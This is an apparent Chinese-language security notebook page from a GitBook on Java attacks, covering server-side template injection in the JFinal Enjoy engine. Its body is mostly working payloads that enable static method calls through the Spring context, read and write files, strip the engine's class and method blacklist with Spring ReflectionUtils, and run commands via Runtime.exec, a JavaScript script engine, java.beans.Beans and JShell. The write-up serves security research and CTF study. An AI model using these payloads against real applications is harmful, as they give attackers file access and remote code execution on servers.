Java
  • About This Book
  • 🍖Prerequisites
    • 反射
      • 反射基本使用
      • 高版本JDK反射绕过
      • 反射调用命令执行
      • 反射构造HashMap
      • 方法句柄
    • 类加载
      • 动态加载字节码
      • 双亲委派模型
      • BCEL
      • SPI
    • RMI & JNDI
      • RPC Intro
      • RMI
      • JEP 290
      • JNDI
    • Misc
      • Unsafe
      • 代理模式
      • JMX
      • JDWP
      • JPDA
      • JVMTI
      • JNA
      • Java Security Manager
  • 👻Serial Journey
    • URLDNS
    • SerialVersionUID
    • Commons Collection 🥏
      • CC1-TransformedMap
      • CC1-LazyMap
      • CC6
      • CC3
      • CC2
    • FastJson 🪁
      • FastJson-Basic Usage
      • FastJson-TemplatesImpl
      • FastJson-JdbcRowSetImpl
      • FastJson-BasicDataSource
      • FastJson-ByPass
      • FastJson与原生反序列化(一)
      • FastJson与原生反序列化(二)
      • Jackson的原生反序列化利用
    • Other Components
      • SnakeYaml
      • C3P0
      • AspectJWeaver
      • Rome
      • Spring
      • Hessian
      • Hessian_Only_JDK
      • Kryo
      • Dubbo
  • 🌵RASP
    • JavaAgent
    • JVM
    • ByteCode
    • JNI
    • ASM 🪡
      • ASM Intro
      • Class Generation
      • Class Transformation
    • Rasp防御命令执行
    • OpenRASP
  • 🐎Memory Shell
    • Tomcat-Architecture
    • Servlet API
      • Listener
      • Filter
      • Servlet
    • Tomcat-Middlewares
      • Tomcat-Valve
      • Tomcat-Executor
      • Tomcat-Upgrade
    • Agent MemShell
    • WebSocket
    • 内存马查杀
    • IDEA本地调试Tomcat
  • ✂️JDBC Attack
    • MySQL JDBC Attack
    • H2 JDBC Attack
  • 🎨Templates
    • FreeMarker
    • Thymeleaf
    • Enjoy
  • 🎏MessageQueue
    • ActiveMQ CNVD-2023-69477
    • AMQP CVE-2023-34050
    • Spring-Kafka CVE-2023-34040
    • RocketMQ CVE-2023-33246
  • 🛡️Shiro
    • Shiro Intro
    • Request URI ByPass
    • Context Path ByPass
    • Remember Me反序列化 CC-Shiro
    • CB1与无CC依赖的反序列化链
  • 🍺Others
    • Deserialization Twice
    • A New Blazer 4 getter RCE
    • Apache Commons Jxpath
    • El Attack
    • Spel Attack
    • C3P0原生反序列化的JNDI打法
    • Log4j
    • Echo Tech
      • SpringBoot Under Tomcat
    • CTF 🚩
      • 长城杯-b4bycoffee (ROME反序列化)
      • MTCTF2022(CB+Shiro绕过)
      • CISCN 2023 西南赛区半决赛 (Hessian原生JDK+Kryo反序列化)
      • CISCN 2023 初赛 (高版本Commons Collections下其他依赖的利用)
      • CISCN 2021 总决赛 ezj4va (AspectJWeaver写字节码文件到classpath)
      • D^3CTF2023 (新的getter+高版本JNDI不出网+Hessian异常toString)
      • WMCTF2023(CC链花式玩法+盲读文件)
      • 第六届安洵杯网络安全挑战赛(CB PriorityQueue替代+Postgresql JDBC Attack+FreeMarker)
  • 🔍Code Inspector
    • CodeQL 🧶
      • Tutorial
        • Intro
        • Module
        • Predicate
        • Query
        • Type
      • CodeQL 4 Java
        • Basics
        • DFA
        • Example
    • SootUp ✨
      • Intro
      • Jimple
      • DFA
      • CG
    • Tabby 🔦
      • install
    • Theory
      • Static Analysis
        • Intro
        • IR & CFG
        • DFA
        • DFA-Foundation
        • Interprocedural Analysis
        • Pointer Analysis
        • Pointer Analysis Foundation
        • PTA-Context Sensitivity
        • Taint Anlysis
        • Datalog
Powered by GitBook
On this page
  • 开启静态方法调用
  • 黑名单绕过
  • 读文件
  • 写文件
  • 清除黑名单
  • js RCE
  • JShell RCE

Was this helpful?

  1. 🎨Templates

Enjoy

Enjoy模板引擎是国产框架JFinal配套的,文档👉https://jfinal.com/doc/6-1

文档中声称“在模板中可以直接与 java 代码通畅地交互”

这对安全人员来说可是狂喜。大概过一遍文档,有几个值得注意的点

  • 模板热加载

和其他模板引擎一样,为了方便开发时的调试以提高开发效率,Enjoy支持模板热加载,也就是不对模板解析结果进行缓存,每次都会重新读取模板文件来编译,通过如下配置

engine.setDevMode(true);
  • 属性访问调getter

EL表达式也支持点号调用getter特性

field表达式取值优先次序,以user.name为例:

  • 若 user.getName() 存在,则优先调用

  • user 具有 public 修饰的 name 属性,则取 user.name 属性值

  • user 为Model、Record、Map的子类,调用 user.get("name")

  • 静态属性/方法访问

jfinal 5.0.2之后,默认”未启用“,需要添加如下配置

engine.setStaticFieldExpression(true);
engine.setStaticMethodExpression(true);

类名 + :: + 方法名(参数)

  • 输出指令

#()直接回显里面的表达式内容

  • 赋值指令

#set(x=yyyy) 对变量进行赋值

  • 包含指令

#include("../../flag")

#render("../../flag")

可以用这个直接读文件,传入的是相对模板目录的路径,跟less的@import(inline) "../../flag"一样

这里使用目前最新版本5.1.3

<dependency>
    <groupId>com.jfinal</groupId>
    <artifactId>enjoy</artifactId>
    <version>5.1.3</version>
</dependency>

开启静态方法调用

SpringBoot整合Enjoy模板引擎

@Configuration
public class SpringBootConfig {
    @Bean(name = "jfinalViewResolver")
    public JFinalViewResolver getJFinalViewResolver() {
        JFinalViewResolver jfr = new JFinalViewResolver();

        jfr.setSuffix(".html");
        jfr.setContentType("text/html;charset=UTF-8");
        jfr.setOrder(0);
        jfr.setSessionInView(false);

        Engine engine  = JFinalViewResolver.engine;
        engine.setDevMode(true);
        engine.setToClassPathSourceFactory();

        return jfr;
    }
}

发现JFinalViewResolver是AbstractTemplateViewResolver的子类,这个模板视图解析抽象类对应的另一个类,AbstractTemplateView会在Model中放入一个Spring的宏变量。

WebApplicationContext不仅可以获取到ServletContext的引用,还可以获取到spring上下文,即可以访问到AOP容器中注册的Bean。

通过springMacroRequestContext获取注册的JFinalViewResolver,刚好其engine是public属性,拿到后再调用其public方法setStaticMethodExpression

#(springMacroRequestContext.webApplicationContext.getBean('jfinalViewResolver').engine.setStaticMethodExpression(true))
#(springMacroRequestContext.webApplicationContext.getBean('jfinalViewResolver').engine.setStaticFieldExpression(true))

黑名单绕过

静态方法调用前有个WAF,设置了类和方法的黑名单

把大部分常见的类和方法都禁掉了,但难免有漏网之鱼

读文件

#set(x=com.sun.org.apache.xml.internal.security.utils.JavaUtils::getBytesFromFile('/flag'))
#((java.util.Base64::getEncoder()).encodeToString(x))

写文件

#set(x="hacked".getBytes())
#set(y=(java.util.Base64::getDecoder()).decode('YWFhYQ=='))
#(com.sun.org.apache.xml.internal.security.utils.JavaUtils::writeBytesToFilename('/tmp/success',y))

清除黑名单

过滤了removeForbiddenClass和removeForbiddenMethod这两个方法,很容易想到通过反射来绕过,但同样invoke、Method也被过滤了,调用不了Method#invoke。Enjoy模板一般会搭配SpringBoot来使用,而SpringBoot内置了许多工具类,其中就有一个ReflectionUtils,封装了一系列反射有关的方法。

public static Method findMethod(Class<?> clazz, String name, @Nullable Class<?>... paramTypes)
public static Object invokeMethod(Method method, @Nullable Object target, @Nullable Object... args)

完美绕开了Enjoy模板的黑名单

但还有一个问题,就是这里的参数需要为Class对象,forName、Class、ClassLoader、Thread等获取Class对象相关方法和类都被禁了,唯独没有禁loadClass,那我们只要拿到一个ClassLoader对象就能获取到Class对象了。不能实例化对象,只能通过静态方法来获取。主要有下面两种方法拿到ClassLoader对象

// ClassLoader.getSystemClassLoader()
URLClassLoader.getSystemClassLoader()
Thread thread = Thread.currentThread();
ClassLoader contextClassLoader = thread.getContextClassLoader();

第二种显然不行,Thread被ban了。

拿到后再调用loadClass来获取Class对象

#set(methodKit=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("com.jfinal.template.expr.ast.MethodKit"))
#set(runTime=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("java.lang.Runtime"))
#set(clazz=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("java.lang.Class"))
#set(meth=org.springframework.util.ReflectionUtils::findMethod(methodKit,'removeForbiddenClass',clazz))
#(org.springframework.util.ReflectionUtils::invokeMethod(meth,null,runTime))
#((java.lang.Runtime::getRuntime()).exec('calc'))

js RCE

com.jfinal.kit.ReflectKit#newInstance能够实例化一个类

public static Object newInstance(Class<?> clazz) {
    try {
        return clazz.newInstance();
    } catch (ReflectiveOperationException e) {
        throw new RuntimeException(e);
    }
}
#set(clazz=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("javax.script.ScriptEngineManager"))
#set(engine=com.jfinal.kit.ReflectKit::newInstance(clazz))
#(engine.getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("calc")'))

好吧,高高兴兴地发现了一个可以用的方法,因为方法名被ban了。。。

后面找到了JDK自带的一个类java.beans.Beans

instantiate首先会把类名当成序列化对象,加上.ser后缀,ClassLoader.getSystemResourceAsStream获取后进行反序列化。

或找不到序列化对象,再尝试直接实例化类。

#set(engine=java.beans.Beans::instantiate(null, "javax.script.ScriptEngineManager"))
#(engine.getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("calc")'))

JShell RCE

JDK9引入jdk.jshell.JShell

#((jdk.jshell.JShell::create()).eval('Runtime.getRuntime().exec("calc")'))
PreviousThymeleafNextActiveMQ CNVD-2023-69477

Last updated 1 year ago

Was this helpful?

image-20231221210422500
image-20231221210433152
image-20231221210444759
image-20231221210454674
image-20231221210511574
image-20231221210524691
image-20231221210531884